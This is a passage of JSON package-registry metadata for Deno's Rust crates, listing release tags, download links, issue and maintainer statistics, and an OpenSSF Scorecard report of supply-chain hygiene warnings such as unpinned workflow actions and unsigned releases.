.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-28T21:10:49.940Z","dependent_packages_count":0,"downloads":330681,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.75903646654517,"dependent_repos_count":22.00071618306494,"dependent_packages_count":29.140633768565976,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":48.63346213939203},"purl":"pkg:cargo/deno_features","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_features","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_features","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_features/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T02:34:50.351Z","issues_count":6619,"pull_requests_count":9639,"avg_time_to_close_issue":17209143.875658587,"avg_time_to_close_pull_request":1533351.1008099688,"issues_closed_count":3794,"pull_requests_closed_count":8024,"pull_request_authors_count":580,"issue_authors_count":2470,"avg_comments_per_issue":2.509442513974921,"avg_comments_per_pull_request":0.719680464778504,"merged_pull_requests_count":7006,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":663,"past_year_pull_requests_count":1197,"past_year_avg_time_to_close_issue":1426984.6098654708,"past_year_avg_time_to_close_pull_request":1334468.010687023,"past_year_issues_closed_count":223,"past_year_pull_requests_closed_count":655,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2428355957767723,"past_year_avg_comments_per_pull_request":1.1161236424394319,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":483,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1795,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":391,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-04-23T08:32:43.884Z","updated_at":"2025-04-23T08:32:43.884Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-04-23T08:32:43.948Z","updated_at":"2025-04-23T08:32:43.948Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":6669007,"name":"deno_kv","ecosystem":"cargo","description":"Implementation of the Deno database API","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":165,"first_release_published_at":"2023-03-22T22:46:26.534Z","latest_release_published_at":"2026-08-06T11:47:28.862Z","latest_release_number":"0.165.0","last_synced_at":"2026-08-29T21:57:19.919Z","created_at":"2023-03-23T12:05:49.312Z","updated_at":"2026-08-29T21:57:19.920Z","registry_url":"https://crates.io/crates/deno_kv/","install_command":"cargo install deno_kv","documentation_url":"https://docs.rs/deno_kv/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using 